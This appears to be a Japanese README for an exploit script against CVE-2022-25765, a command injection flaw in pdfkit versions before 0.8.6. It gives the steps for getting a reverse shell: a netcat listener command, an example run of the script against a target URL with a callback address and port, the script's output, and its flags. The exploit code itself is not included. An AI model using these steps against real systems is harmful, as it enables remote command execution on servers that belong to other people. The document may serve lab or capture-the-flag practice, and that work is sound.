
CVE-2022-25765 のエクスプロイト - pdfkit < 0.8.6 におけるコマンドインジェクション
pdfkit < 0.8.6 における CVE-2022-25765 コマンドインジェクションのエクスプロイト
脆弱性の詳細はこちらをご覧ください
ホスト上でnetcatを実行:
$ nc -lvnp 1337
エクスプロイトを実行(例):
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection
フラグ:
-t, --target ターゲットのアドレス(http形式)
-a, --addr リバース接続用アドレス
-p, --port リバース接続用ポート(デフォルト: 9001)